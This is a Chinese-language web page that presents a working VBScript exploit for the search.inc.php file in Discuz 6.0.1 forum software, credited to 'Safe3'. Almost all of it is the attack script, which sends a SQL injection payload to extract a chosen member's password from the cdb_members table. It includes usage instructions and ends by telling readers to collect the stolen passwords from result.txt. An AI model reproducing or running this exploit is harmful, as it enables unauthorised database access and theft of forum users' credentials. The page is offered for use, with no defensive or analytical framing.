以下是search.inc.php 文件漏洞利用代码VBS版 复制代码代码如下: Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) strUid=Args(2) End If strUrl=\”action=search&searchid=22%cf\’ UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=\” & strUid &\”/*&do=submit\” Set objXML = CreateObject(\”Microsoft.XMLHTTP\”) objXML.Open \”POST\”,strSite & strPath & \”index.php\”, False objXML.SetRequestHeader \”Accept\”, \”*/*\” objXML.SetRequestHeader \”Accept-Language\”, \”zh-cn\” objXML.SetRequestHeader \”Content-Type\”, \”application/x-www-form-urlencoded\” objXML.SetRequestHeader \”User-Agent\”, \”wap\” objXML.send(strUrl) wscript.echo(objXML.ResponseText) Sub showB() With Wscript .Echo(\”+————————–=====================——————————+\”) .Echo(\”Exploit discuz6.0.1\”) .Echo(\”Code By Safe3\”) .Echo(\”+————————–=====================——————————+\”) End with End Sub Sub showU() With Wscript .Echo(\”+————————–=====================——————————+\”) .Echo(\”用法:\”) .Echo(\” cscript \”&.ScriptName&\” site path uid\”) .Echo(\”例子:\”) .Echo(\” cscript \”&.ScriptName&\” http://www.example.com/ /forum/ 1 >result.txt\”) .Echo(\”+————————–=====================——————————+\”) .Quit End with End Sub 获得的密码大家自己在result.txt中查找
